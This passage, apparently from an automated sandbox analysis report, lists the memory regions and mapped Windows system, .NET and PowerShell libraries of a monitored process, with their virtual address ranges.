688 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 689 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x77a50000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 690 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 691 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 692 start_va = 0x7fef1d00000 end_va = 0x7fef1d6efff entry_point = 0x7fef1d00000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 693 start_va = 0x7fefb9f0000 end_va = 0x7fefba08fff entry_point = 0x7fefb9f0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 694 start_va = 0x7fefde70000 end_va = 0x7fefde7dfff entry_point = 0x7fefde70000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 695 start_va = 0x7fefde80000 end_va = 0x7fefdf1efff entry_point = 0x7fefde80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 696 start_va = 0x7fefdfc0000 end_va = 0x7fefe096fff entry_point = 0x7fefdfc0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 697 start_va = 0x7fefe210000 end_va = 0x7fefe276fff entry_point = 0x7fefe210000 region_type = mapped_file name = "gdi32.dll" filename = 
"\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 698 start_va = 0x7fefe280000 end_va = 0x7fefe2f0fff entry_point = 0x7fefe280000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 699 start_va = 0x7fefe410000 end_va = 0x7fefe4eafff entry_point = 0x7fefe410000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 700 start_va = 0x7fefe4f0000 end_va = 0x7fefe6f2fff entry_point = 0x7fefe4f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 701 start_va = 0x7feff9a0000 end_va = 0x7feffaccfff entry_point = 0x7feff9a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 702 start_va = 0x7feffd70000 end_va = 0x7feffe38fff entry_point = 0x7feffd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 703 start_va = 0x7feffe40000 end_va = 0x7feffe5efff entry_point = 0x7feffe40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 704 start_va = 0x340000 end_va = 0x346fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 705 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 706 start_va = 0x360000 end_va = 0x362fff entry_point = 0x360000 region_type = mapped_file name = "powershell.exe.mui" filename = 
"\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 707 start_va = 0x370000 end_va = 0x370fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 708 start_va = 0x390000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 709 start_va = 0x520000 end_va = 0x6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 710 start_va = 0x6b0000 end_va = 0x1aaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 711 start_va = 0x1ab0000 end_va = 0x1ab0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 712 start_va = 0x1ac0000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 713 start_va = 0x1be0000 end_va = 0x1beffff entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 714 start_va = 0x1c40000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 715 start_va = 0x7fefd990000 end_va = 0x7fefd99efff entry_point = 0x7fefd990000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 716 start_va = 0x7fefe1e0000 end_va = 0x7fefe20dfff entry_point = 0x7fefe1e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 717 start_va = 0x7fefe300000 end_va = 0x7fefe408fff entry_point = 0x7fefe300000 region_type = mapped_file name = "msctf.dll" filename = 
"\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 718 start_va = 0x7fefc3f0000 end_va = 0x7fefc445fff entry_point = 0x7fefc3f0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 719 start_va = 0x1bc0000 end_va = 0x1bc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bc0000" filename = "" Region: id = 720 start_va = 0x1bd0000 end_va = 0x1bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bd0000" filename = "" Region: id = 721 start_va = 0x1cc0000 end_va = 0x1d9efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cc0000" filename = "" Region: id = 722 start_va = 0x1eb0000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 723 start_va = 0x7fefe700000 end_va = 0x7feff487fff entry_point = 0x7fefe700000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 724 start_va = 0x7feffcd0000 end_va = 0x7feffd68fff entry_point = 0x7feffcd0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 725 start_va = 0x7fefce40000 end_va = 0x7fefce5dfff entry_point = 0x7fefce40000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 726 start_va = 0x7fefdaa0000 end_va = 0x7fefdaaefff entry_point = 0x7fefdaa0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 727 start_va = 0x1bf0000 end_va = 0x1bf1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001bf0000" filename = "" Region: id = 728 start_va = 0x7fefc5d0000 end_va = 0x7fefc7c3fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 729 start_va = 0x1c00000 end_va = 0x1c00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 730 start_va = 0x1c10000 end_va = 0x1c11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 731 start_va = 0x1f30000 end_va = 0x21fefff entry_point = 0x1f30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 732 start_va = 0x2280000 end_va = 0x22fffff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 733 start_va = 0x2300000 end_va = 0x26f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 734 start_va = 0x7fefc450000 end_va = 0x7fefc57bfff entry_point = 0x7fefc450000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 735 start_va = 0x7fefdb50000 end_va = 0x7fefdb69fff entry_point = 0x7fefdb50000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 736 start_va = 0x7fefde30000 end_va = 0x7fefde65fff entry_point = 0x7fefde30000 region_type = mapped_file name = "cfgmgr32.dll" filename = 
"\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 737 start_va = 0x7feffaf0000 end_va = 0x7feffcc6fff entry_point = 0x7feffaf0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 738 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 739 start_va = 0x7fefbd50000 end_va = 0x7fefbd7cfff entry_point = 0x7fefbd50000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 740 start_va = 0x7feff8f0000 end_va = 0x7feff941fff entry_point = 0x7feff8f0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 741 start_va = 0x1c30000 end_va = 0x1c30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 742 start_va = 0x1da0000 end_va = 0x1dbcfff entry_point = 0x1da0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 743 start_va = 0x2200000 end_va = 0x227ffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 744 start_va = 0x7fefaad0000 end_va = 0x7fefab26fff entry_point = 0x7fefaad0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 745 
start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 746 start_va = 0x1c20000 end_va = 0x1c23fff entry_point = 0x1c20000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 747 start_va = 0x1dc0000 end_va = 0x1deffff entry_point = 0x1dc0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 748 start_va = 0x1df0000 end_va = 0x1df3fff entry_point = 0x1df0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 749 start_va = 0x1e00000 end_va = 0x1e65fff entry_point = 0x1e00000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 750 start_va = 0x27a0000 end_va = 0x281ffff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 751 start_va = 0x7fef7ab0000 end_va = 0x7fef7abbfff entry_point = 0x7fef7ab0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 752 start_va = 0x7fef7ac0000 end_va = 
0x7fef7af3fff entry_point = 0x7fef7ac0000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 753 start_va = 0x7fef7fc0000 end_va = 0x7fef803ffff entry_point = 0x7fef7fc0000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 754 start_va = 0x7fef8040000 end_va = 0x7fef804efff entry_point = 0x7fef8040000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 755 start_va = 0x7fefba50000 end_va = 0x7fefba5afff entry_point = 0x7fefba50000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 756 start_va = 0x7fefd890000 end_va = 0x7fefd8b2fff entry_point = 0x7fefd890000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 757 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 758 start_va = 0x7fefd390000 end_va = 0x7fefd3a6fff entry_point = 0x7fefd390000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 759 start_va = 0x7fefd090000 end_va = 0x7fefd0d6fff entry_point = 0x7fefd090000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 760 start_va = 0x7feea9c0000 end_va = 0x7feeaa58fff entry_point = 0x7feea9c0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: 
"c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 761 start_va = 0x7fefcc60000 end_va = 0x7fefcc6bfff entry_point = 0x7fefcc60000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 762 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e70000" filename = "" Region: id = 763 start_va = 0x28d0000 end_va = 0x294ffff entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 764 start_va = 0x756a0000 end_va = 0x75768fff entry_point = 0x756a0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll") Region: id = 765 start_va = 0x7fee8cc0000 end_va = 0x7fee965cfff entry_point = 0x7fee8cc0000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll") Region: id = 766 start_va = 0x1e80000 end_va = 0x1e82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 767 start_va = 0x1e90000 end_va = 0x1e90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 768 start_va = 0x2700000 end_va = 0x271ffff entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 769 start_va = 0x2950000 end_va = 0x2a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 770 start_va = 0x2a80000 end_va = 0x2a8ffff entry_point = 0x0 region_type = private 
name = "private_0x0000000002a80000" filename = "" Region: id = 771 start_va = 0x2b40000 end_va = 0x2bbffff entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 772 start_va = 0x2bc0000 end_va = 0x1abbffff entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 773 start_va = 0x1abc0000 end_va = 0x1b28ffff entry_point = 0x0 region_type = private name = "private_0x000000001abc0000" filename = "" Region: id = 774 start_va = 0x1b290000 end_va = 0x1b390fff entry_point = 0x0 region_type = private name = "private_0x000000001b290000" filename = "" Region: id = 775 start_va = 0x1b490000 end_va = 0x1b50ffff entry_point = 0x0 region_type = private name = "private_0x000000001b490000" filename = "" Region: id = 776 start_va = 0x7fee7de0000 end_va = 0x7fee8cbbfff entry_point = 0x7fee7de0000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll") Region: id = 777 start_va = 0x7ff00020000 end_va = 0x7ff0002ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00020000" filename = "" Region: id = 778 start_va = 0x7ff00030000 end_va = 0x7ff0003ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00030000" filename = "" Region: id = 779 start_va = 0x7ff00040000 end_va = 0x7ff000dffff entry_point = 0x0 region_type = private name = "private_0x000007ff00040000" filename = "" Region: id = 780 start_va = 0x7ff000e0000 end_va = 0x7ff000effff entry_point = 0x0 region_type = private name = "private_0x000007ff000e0000" filename = "" Region: id = 781 start_va = 0x7ff000f0000 end_va = 0x7ff0015ffff entry_point = 0x0 region_type = private name = "private_0x000007ff000f0000" filename = "" Region: id = 782 start_va = 
0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 783 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 784 start_va = 0x1ea0000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 785 start_va = 0x1b510000 end_va = 0x1b7f1fff entry_point = 0x1b510000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 786 start_va = 0x7fee73b0000 end_va = 0x7fee7dd2fff entry_point = 0x7fee73b0000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll") Region: id = 787 start_va = 0x7fee97c0000 end_va = 0x7fee9871fff entry_point = 0x7fee97c0000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll") Region: id = 788 start_va = 0x7fffff10000 end_va = 0x7fffff1ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff10000" filename = "" Region: id = 789 start_va = 0x7fffff20000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = 
"private_0x000007fffff20000" filename = "" Region: id = 790 start_va = 0x7fee6850000 end_va = 0x7fee73acfff entry_point = 0x7fee6850000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll") Region: id = 791 start_va = 0x7ff00160000 end_va = 0x7ff0016ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00160000" filename = "" Region: id = 792 start_va = 0x2720000 end_va = 0x2722fff entry_point = 0x2720000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls") Region: id = 793 start_va = 0x1b3a0000 end_va = 0x1b45ffff entry_point = 0x1b3a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 794 start_va = 0x77d20000 end_va = 0x77d26fff entry_point = 0x77d20000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 795 start_va = 0x2730000 end_va = 0x2730fff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 796 start_va = 0x2740000 end_va = 0x2744fff entry_point = 0x2740000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 797 start_va = 0x2750000 end_va = 0x2790fff entry_point = 0x2750000 region_type = mapped_file name = "sortkey.nlp" filename = 
"\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 798 start_va = 0x7ff00170000 end_va = 0x7ff0017ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00170000" filename = "" Region: id = 799 start_va = 0x2820000 end_va = 0x2827fff entry_point = 0x2820000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 800 start_va = 0x2830000 end_va = 0x2830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002830000" filename = "" Region: id = 801 start_va = 0x1e230000 end_va = 0x1e278fff entry_point = 0x1e230000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 802 start_va = 0x7fee6310000 end_va = 0x7fee63f4fff entry_point = 0x7fee6310000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll") Region: id = 803 start_va = 0x7fee6400000 end_va = 0x7fee64a9fff entry_point = 0x7fee6400000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = 
"\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll") Region: id = 804 start_va = 0x7fee64b0000 end_va = 0x7fee6518fff entry_point = 0x7fee64b0000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 805 start_va = 0x7fee6520000 end_va = 0x7fee684dfff entry_point = 0x7fee6520000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll") Region: id = 806 start_va = 0x7fee9d60000 end_va = 0x7fee9d91fff entry_point = 0x7fee9d60000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll") Region: id = 807 start_va = 0x2840000 end_va = 0x2840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002840000" filename = "" Region: id = 808 start_va = 0x1b800000 end_va = 0x1b8fffff entry_point = 0x0 region_type = private name = "private_0x000000001b800000" filename 
= "" Region: id = 809 start_va = 0x642ff4a0000 end_va = 0x642ff4a9fff entry_point = 0x642ff4a0000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll") Region: id = 810 start_va = 0x7fee5fd0000 end_va = 0x7fee60e7fff entry_point = 0x7fee5fd0000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll") Region: id = 811 start_va = 0x7fee60f0000 end_va = 0x7fee6305fff entry_point = 0x7fee60f0000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll") Region: id = 812 start_va = 0x7fee9780000 end_va = 0x7fee97bdfff entry_point = 0x7fee9780000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = 